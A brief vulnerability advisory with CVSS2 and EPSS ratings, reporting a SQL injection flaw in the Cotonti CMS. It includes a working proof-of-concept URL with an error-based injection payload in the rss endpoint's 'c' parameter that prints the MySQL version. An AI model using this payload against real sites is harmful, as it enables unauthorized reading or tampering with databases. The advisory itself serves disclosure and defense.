7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.005 Low
EPSS
Percentile
72.3%
High-Tech Bridge Security Research Lab discovered vulnerability in Cotonti, which can be exploited to perform SQL injection attacks against vulnerable application. A remote attacker can read, modify or delete data in application’s database and even gain complete control over the application under certain circumstances.
The following PoC code displays version of MySQL server:
http://[host]/index.php?e=rss&c=%27and%28select%201%20from%28select%20count% 28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%28 0%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and% 27